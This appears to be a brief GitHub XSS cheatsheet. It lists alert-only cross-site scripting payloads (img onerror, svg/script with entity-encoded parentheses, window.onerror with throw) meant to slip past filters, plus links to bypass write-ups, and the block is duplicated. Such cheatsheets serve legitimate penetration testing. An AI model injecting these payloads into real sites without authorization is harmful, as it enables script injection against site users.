naveen12/xss-cheatsheet

## xss-cheatsheet
depending on your specific scenario you might want to try to inject one of those:

<img onerror="window.alert('hey')" src="bla"/>

<svg><script>alert&#40/hey/.source&#41</script></svg>

<img onerror="window.onerror=alert;throw 'hey'" src="bla"/>
<script>window.onerror=alert;throw "hey";</script>

inspiration:
- http://www.thespanner.co.uk/2012/05/01/xss-technique-without-parentheses/
- https://security.stackexchange.com/a/36630/8000
- https://security.stackexchange.com/questions/71317/stored-cross-site-scripting-without-parentheses-or-spaces
- https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/
	depending on your specific scenario you might want to try to inject one of those:

	<img onerror="window.alert('hey')" src="bla"/>

	<svg><script>alert&#40/hey/.source&#41</script></svg>

	<img onerror="window.onerror=alert;throw 'hey'" src="bla"/>
	<script>window.onerror=alert;throw "hey";</script>

	inspiration:
	- http://www.thespanner.co.uk/2012/05/01/xss-technique-without-parentheses/
	- https://security.stackexchange.com/a/36630/8000
	- https://security.stackexchange.com/questions/71317/stored-cross-site-scripting-without-parentheses-or-spaces
	- https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/